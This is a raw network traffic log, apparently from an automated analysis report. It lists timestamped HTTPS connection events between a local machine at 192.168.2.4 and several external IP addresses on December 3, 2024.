                                                                                                                      Dec 3, 2024 08:55:20.762803078 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.762829065 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.762836933 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.762882948 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766094923 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766139984 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.766207933 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766594887 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766639948 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.766693115 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766863108 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.766877890 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.767014980 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.767030001 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.907505989 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.907592058 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.907661915 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.907943964 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.907958984 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.907973051 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.907979012 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.911472082 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.911505938 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.911628962 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.911815882 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.911828041 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.945538998 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.945616961 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.945684910 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.945931911 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.945947886 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.945959091 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.945965052 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.953576088 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.953610897 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.953694105 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.953879118 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.953897953 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.959808111 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.959892035 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.959947109 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.960166931 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.960182905 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.960194111 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.960201025 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.963149071 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.963176012 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.963252068 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.963409901 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.963421106 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.040431976 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.040497065 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.040550947 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.041035891 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.041054010 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.041066885 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.041073084 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.044536114 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.044560909 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.044631958 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.044814110 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.044822931 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.336507082 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.336822033 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.336852074 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.337182999 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.337601900 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.337655067 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.338160038 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.383342028 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.402877092 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.403228998 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.403245926 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.403601885 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.403974056 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.404038906 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.404140949 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:21.447338104 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.709662914 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.710365057 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.710385084 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:21.710880041 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:21.710886002 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.153378963 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.153461933 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.153527975 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.154445887 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.154445887 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.154464960 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.154474974 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.158313036 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.158338070 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.158431053 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.158611059 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.158624887 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.183789968 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.183810949 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.183897018 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.183919907 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.228770971 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.242722034 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.242750883 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.242809057 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.242824078 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.259378910 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.259443998 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.259454966 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.259468079 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.259500027 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.259538889 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.260221958 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.260237932 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.264595985 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.264630079 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.264746904 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.265028000 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.265042067 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.425903082 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.425915003 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.425996065 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.439659119 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.439745903 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.463583946 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.463669062 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.481822014 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.481889963 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.494777918 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.495078087 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.495093107 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.495501041 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.495868921 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.495924950 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.496057987 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.507839918 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.508059025 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.508073092 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.509059906 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.509154081 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.509444952 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.509502888 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.509845972 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.509851933 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.539335012 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.559561968 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.634258032 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.634774923 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.634812117 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.641485929 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.641500950 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.676348925 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.676434040 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.685425997 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.685482979 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.704757929 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.704838037 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.720475912 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.720568895 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.735024929 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.735093117 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.747375965 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.748080969 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.748106003 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.748631001 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.748636961 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.754499912 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.754539013 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.754575968 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.754609108 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.754622936 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.754648924 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.754678011 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.755371094 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.755388975 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.766546011 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.766582966 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.766655922 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.767268896 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.767282009 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.780363083 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.780409098 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.780478001 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.786854029 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.786873102 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.798118114 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798141956 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.798255920 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798393965 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798413992 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.798456907 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798604012 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798644066 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.798691988 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.798909903 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.799099922 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.799108982 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.799398899 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.799410105 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.799710035 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:22.799730062 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.813529015 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.813551903 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.814193964 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.814198971 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.891150951 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.891710997 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.891736984 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.892225981 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:22.892232895 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.955193043 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:22.955229044 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:22.955353975 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:22.955540895 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:22.955554962 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.072503090 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.072585106 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.072689056 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.072953939 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.072971106 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.072983027 CET49870443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.072989941 CET4434987013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.078579903 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.078632116 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.078737020 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.078975916 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.078994989 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.192789078 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.192866087 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.193180084 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.193180084 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.193208933 CET49872443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.193223953 CET4434987213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.196438074 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.196485996 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.196557045 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.196728945 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.196748972 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.252948999 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.253021002 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.253252983 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.253279924 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.253290892 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.253304005 CET49871443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.253309011 CET4434987113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.256346941 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.256386995 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.256469965 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.256665945 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.256675959 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.326728106 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.326745033 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.326843977 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.326857090 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.327178001 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.327243090 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.328097105 CET49869443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.328113079 CET44349869196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.328469992 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.328506947 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.328579903 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.329113007 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.329127073 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.331688881 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.331713915 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.331811905 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.332000971 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.332014084 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.346363068 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.346395969 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.346477032 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.346493006 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.346523046 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.346589088 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.347850084 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.347917080 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.347935915 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.347945929 CET49873443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.347951889 CET4434987313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.350851059 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.350884914 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.350950003 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.351103067 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.351114988 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.365556002 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.365654945 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.365662098 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.365705013 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.366058111 CET49868443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.366067886 CET44349868196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.366405964 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.366425037 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.368670940 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.368917942 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.368930101 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.381417036 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.381453037 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.381629944 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.381748915 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:23.381762028 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.939107895 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.939800978 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.939821959 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:23.940273046 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:23.940278053 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.082627058 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.082896948 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.082914114 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.083218098 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.083615065 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.083676100 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.083834887 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.127337933 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.384053946 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.384125948 CET4434987413.107.246.63192.168.2.4
